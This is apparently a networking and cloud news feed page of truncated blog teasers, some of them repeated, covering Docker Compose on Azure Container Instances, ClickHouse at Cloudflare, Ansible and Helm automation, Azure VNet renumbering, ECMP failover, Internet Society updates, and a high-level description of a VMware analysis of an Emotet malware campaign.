Compose CLI ACI Integration Now Available

Today we are pleased to announce that we have reached a major milestone, reaching GA and our V1 of both the Compose CLI and the ACI integration. ?

In May we announced the partnership between Docker and Microsoft to make it easier to deploy containerized applications from the Desktop to the cloud with Azure Container Instances (ACI). We are happy to let you know that all users of Docker Desktop now have the ACI experience available to them by default, allowing them to easily use existing Docker commands to deploy and manage containers running in ACI. 

As part of this I want to also call out a thank you to the MSFT team who have worked with us to make this all happen! That is a big thank you to Mike Morton, Karol Zadora-Przylecki, Brandon Waterloo, MacKenzie Olson, and Paul Yuknewicz.

Getting started with Docker and ACI 

As a new starter, to get going all you will need to do is upgrade your existing Docker Desktop to the latest stable version (2.5.0.0 or later), store your image on Docker Hub so you can deploy it (you can get started with Hub here) and then lastly you Continue reading

Switching Back Into A Higher Gear

If you want to get a sense of what is happening in the high-end of the Ethernet switch and routing market, it is Arista Networks, formerly an upstart and now just one of the bigger vendors taking on the hegemony of Cisco Systems in networking in the datacenter and now on the campus and at the edge, is probably the best bellwether there is.

Switching Back Into A Higher Gear was written by Timothy Prickett Morgan at The Next Platform.

Changes to Our Work in 2021

Here at the Internet Society, we believe that the Internet is for everyone. Our work focuses on ensuring that the Internet remains open, globally-connected, trustworthy, and secure.

In 2020, we saw the world change in ways that no one could have anticipated.  Because of this, like so many other organizations, we had to assess our current and future plans and evaluate the resources available to us. As a result, we have made some changes to our activities for the upcoming year.

Moving into 2021, we will reduce activities related to our Open Standards Everywhere (OSE) and Time Security projects.

We still deeply believe that open Internet standards and securing the Internet’s time synchronization infrastructure are critical components for building an open and trustworthy Internet. So, while OSE and Time Security will no longer be standalone projects next year, we will continue to promote and defend these concepts through our other projects, initiatives, and activities.

Our work in 2020 in both these areas has had a measurable impact and many successes, which we will document in the 2020 Impact Report that will be published in early 2021. We will continue to finish work in progress on Time Security and OSE Continue reading

Defeat Emotet Attacks with Behavior-Based Malware Protection

The security community has enjoyed a few months of silence from Emotet, an advanced and evasive malware threat, since February of this year. But the silence was broken in July as the VMware Threat Analysis Unit (TAU) observed a major new Emotet campaign and, since then, fresh attacks have continued to surface. What caught the attention of VMware TAU is that the security community still lacks the capacity to effectively detect and prevent Emotet, even though it first appeared in 2014. As an example of this, Figure 1 shows the detection status on VirusTotal for one of the weaponized documents from a recent Emotet attack. Only about 25% of antivirus engines blocked the file, even though the key techniques — such as a base64-encoded PowerShell script used to download the Emotet payload from one of five URLs — are nothing new. (These results were checked five days after they were first submitted to VirusTotal.)

Figure 1: Detection of an Emotet-related document on VirusTotal

In this blog post, we’ll investigate the first stage of the recent Emotet attacks by analyzing one of the samples from the recent campaign to reveal the tactics, techniques, and procedures (TTPs) used. This will help Continue reading

ClickHouse Capacity Estimation Framework

ClickHouse Capacity Estimation Framework

We use ClickHouse widely at Cloudflare. It helps us with our internal analytics workload, bot management, customer dashboards, and many other systems. For instance, before Bot Management can analyze and classify our traffic, we need to collect logs. The Firewall Analytics tool needs to store and query data somewhere too. The same goes for our new Cloudflare Radar project. We are using ClickHouse for this purpose. It is a big database that can store huge amounts of data and return it on demand. This is not the first time we have talked about ClickHouse, there is a dedicated blogpost on how we introduced ClickHouse for HTTP analytics.

Our biggest cluster has more than 100 nodes, another one about half that number. Besides that, we have over 20 clusters that have at least three nodes and the replication factor of three. Our current insertion rate is about 90M rows per second.

We use the standard approach in ClickHouse schema design. At the top level we have clusters, which hold shards, a group of nodes, and a node is a physical machine. You can find technical characteristics of the nodes here. Stored data is replicated between clusters. Different shards hold different parts Continue reading

Ansible 2.10 introduction

Hello my friend,

as you know, Ansible is one of the leading tools for the automation of the IT and network infrastructure. We have written a lot about it earlier (e.g. CLI configs, OpenConfig with NETCONF, or VNF-M). Recently Red Hat announced the new version of Ansible (Ansible 2.10), which changes a lot the way we used to work with that.


1
2
3
4
5
No part of this blogpost could be reproduced, stored in a
retrieval system, or transmitted in any form or by any
means, electronic, mechanical or photocopying, recording,
or otherwise, for commercial purposes without the
prior permission of the author.

Eager to learn about network automation?

We are here to help you. At our network automation training you learn all you need to know to be successful with such tasks in your profession:

  • Linux, Docker, KVM
  • YANG models
  • JSON, XML, Protocol Buffers (Protobuf) data formats
  • SSH, REST API, gRPC transport
  • gNMI, NETCONF, RESTCONF protocols
  • How to use and manage everything above with Ansible, Bash, and Python

Start your automation training today.

What that is about

Ansible 2.10 is more than a just another Ansible’s update. It is a new approach, paradigm shift, Continue reading

Renumbering Public Cloud Address Space

Got this question from one of the networking engineers “blessed” with rampant clueless-rush-to-the-cloud.

I plan to peer multiple VNet from different regions. The problem is that there is not any consistent deployment in regards to the private IP subnets used on each VNet to the point I found several of them using public IP blocks as private IP ranges. As far as I recall, in Azure we can’t re-ip the VNets as the resource will be deleted so I don’t see any other option than use NAT from offending VNet subnets to use my internal RFC1918 IPv4 range. Do you have a better idea?

The way I understand Azure, while you COULD have any address range configured as VNet CIDR block, you MUST have non-overlapping address ranges for VNet peering.

Renumbering Public Cloud Address Space

Got this question from one of the networking engineers “blessed” with rampant clueless-rush-to-the-cloud.

I plan to peer multiple VNet from different regions. The problem is that there is not any consistent deployment in regards to the private IP subnets used on each VNet to the point I found several of them using public IP blocks as private IP ranges. As far as I recall, in Azure we can’t re-ip the VNets as the resource will be deleted so I don’t see any other option than use NAT from offending VNet subnets to use my internal RFC1918 IPv4 range. Do you have a better idea?

The way I understand Azure, while you COULD have any address range configured as VNet CIDR block, you MUST have non-overlapping address ranges for VNet peering.

Day Two Cloud 073: AnsibleFest & HashiConf 2020 Announcements, Analysis & Awesomeness

Ned Bellavance and Ethan Banks analyze the big announcements from two conferences the clouderati should care about: AnsibleFest and HashiConf Digital. Both of these were virtual events because there's still an pandemic on, folks. Speaking of which, how do Ned and Ethan feel about virtual events? Not great, really. Slidewhipping the attendees in multi-day webinars seems to be how vendors are running their virtual conferences, and it ain't workin'...

Day Two Cloud 073: AnsibleFest & HashiConf 2020 Announcements, Analysis & Awesomeness

Ned Bellavance and Ethan Banks analyze the big announcements from two conferences the clouderati should care about: AnsibleFest and HashiConf Digital. Both of these were virtual events because there's still an pandemic on, folks. Speaking of which, how do Ned and Ethan feel about virtual events? Not great, really. Slidewhipping the attendees in multi-day webinars seems to be how vendors are running their virtual conferences, and it ain't workin'...

The post Day Two Cloud 073: AnsibleFest & HashiConf 2020 Announcements, Analysis & Awesomeness appeared first on Packet Pushers.

Sometimes HPC Means Big Memory, Not Big Compute

Not every HPC or analytics workload – meaning an algorithmic solver and the data that it chews on – fits nicely in a 128 GB or 256 GB or even a 512 GB memory space, and sometimes the dataset is quite large and runs best with a larger memory space rather than carving it up into smaller pieces and distributing across nodes with the same amount of raw compute.

Sometimes HPC Means Big Memory, Not Big Compute was written by Timothy Prickett Morgan at The Next Platform.

Message from Internet Society Audit Committee Chair

As Chair of the Internet Society Audit Committee, I wanted to share an update with you.

As you may know, the Audit Committee reviews the Conflict of Interest forms filed by members of the Board of Trustees and officers of the Internet Society to ensure that we are in compliance with our Conflict of Interest (“CoI”) policy.

The CoI policy states that members of the Board of Trustees cannot hold a position in the policy development process in another organization operating in the Internet Society’s areas of engagement, and we are evaluating a situation where this restriction may be relevant. One of our Trustees has been appointed as a non-voting member to the GSNO Council, the Generic Names Supporting Organization – a policy-development body that develops and recommends policies relating to generic top-level domains (gTLDs) to the ICANN Board.

The Internet Society has a long history of collaborating with our diverse community from around the world, and is committed to having vibrant and robust global engagement. We work across countries and cultures and seek diverse cross-organizational expertise. This makes us stronger—sound practices and clear policies are a critical part of that.

We recognize that the expertise of our trustees is Continue reading

Automating Helm using Ansible

Increasing business demands are driving the need for increased automation to support rapid, yet stable, and reliable deployments of applications and supporting infrastructure. Kubernetes and cloud-native technologies are no different. For the Kubernetes platform, Helm is the standard means of packaging, configuring and deploying applications and services onto any cluster.

We recently released the kubernetes.core 1.1, our first Red Hat Certified Content Collection release, for general use. A big part of the new content that has been introduced is support for automating Helm operations. In this blog post, I will show you some common scenarios for its use in your automation.

Please note that prior to the release of kubernetes.core 1.1, its contents were released as community.kubernetes. With this content becoming Red Hat support and certified content, a name change was in order. We are in the process of making that transition

 

A Quick Introduction to Helm

Helm is an open source tool used for packaging and deploying applications on Kubernetes. It is often called Kubernetes Package Manager. It is widely adopted by the Kubernetes community and the Cloud Native Computing Foundation (CNCF) graduate project.

Helm simplifies deployment of the applications by abstracting Continue reading

Do We Need LFA or FRR for Fast Failover in ECMP Designs?

One of my readers sent me a question along these lines:

Imagine you have a router with four equal-cost paths to prefix X, two toward upstream-1 and two toward upstream-2. Now let’s suppose that one of those links goes down and you want to have link protection. Do I really need Loop-Free Alternate (LFA) or MPLS Fast Reroute (FRR) to get fast (= immediate) failover or could I rely on multiple equal-cost paths to get the job done? I’m getting different answers from different vendors…

Please note that we’re talking about a very specific question of whether in scenarios with equal-cost layer-3 paths the hardware forwarding data structures get adjusted automatically on link failure (without CPU reprogramming them), and whether LFA needs to be configured to make the adjustment happen.

Do We Need LFA or FRR for Fast Failover in ECMP Designs?

One of my readers sent me a question along these lines:

Imagine you have a router with four equal-cost paths to prefix X, two toward upstream-1 and two toward upstream-2. Now let’s suppose that one of those links goes down and you want to have link protection. Do I really need Loop-Free Alternate (LFA) or MPLS Fast Reroute (FRR) to get fast (= immediate) failover or could I rely on multiple equal-cost paths to get the job done? I’m getting different answers from different vendors…

Please note that we’re talking about a very specific question of whether in scenarios with equal-cost layer-3 paths the hardware forwarding data structures get adjusted automatically on link failure (without CPU reprogramming them), and whether LFA needs to be configured to make the adjustment happen.